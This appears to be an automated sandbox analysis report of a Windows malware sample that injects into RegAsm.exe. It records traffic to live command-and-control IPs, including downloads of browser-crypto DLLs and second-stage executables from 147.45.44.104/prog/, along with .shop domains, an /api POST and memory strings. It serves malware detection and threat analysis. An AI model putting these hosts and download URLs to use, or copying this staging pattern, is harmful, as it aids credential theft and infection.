Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040503C InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_0040503C

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d0cd8fb6f7b_lgjfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66d0cd9a65b5d_vqwergf.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: awwardwiqi.shop
Source: global traffic	DNS traffic detected: DNS query: locatedblsoqp.shop
Source: global traffic	DNS traffic detected: DNS query: stadiatechnologies.com
Source: global traffic	DNS traffic detected: DNS query: traineiwnqo.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: awwardwiqi.shop

Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Http://147.45.68.138:80e
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exe1kkkk1035441http://147.45.44.104/prog/66d0cd9a65b5d
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd8fb6f7b_lgjfd.exeorm-data;
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exe
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66d0cd9a65b5d_vqwergf.exem-data;
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.0000000001379000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/(
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/G=6f
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/KEBGI
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/b=
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/freebl3.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/mozglue.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/mozglue.dll%
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/msvcp140.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/msvcp140.dll?
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/nss3.dll9b
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/nss3.dllhb
Source: RegAsm.exe, 0000000C.00000002.2377742353.0000000001379000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/p
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/softokn3.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2377742353.000000000130C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dll
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dllLbz
Source: RegAsm.exe, 0000000C.00000002.2377742353.000000000131D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/sql.dllurer
Source: RegAsm.exe, 0000000C.00000002.2377742353.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/u~
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138/vcruntime140.dll
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80790dee73nt-Disposition:
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:808/2024
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000480000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80AE
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80AFsrss.exe
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80CA
Source: RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80e
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80form-data;
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80hellohttps://steamcommunity.com/profiles/76561199761128941b
Source: RegAsm.exe, 0000000C.00000002.2375283743.000000000049D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.68.138:80ocal
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://64532127VdtSrezylanAPHTGetSystemInfoGetSystemTimeSleepkernel32.dllSymMatchStringInternetSetOp
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
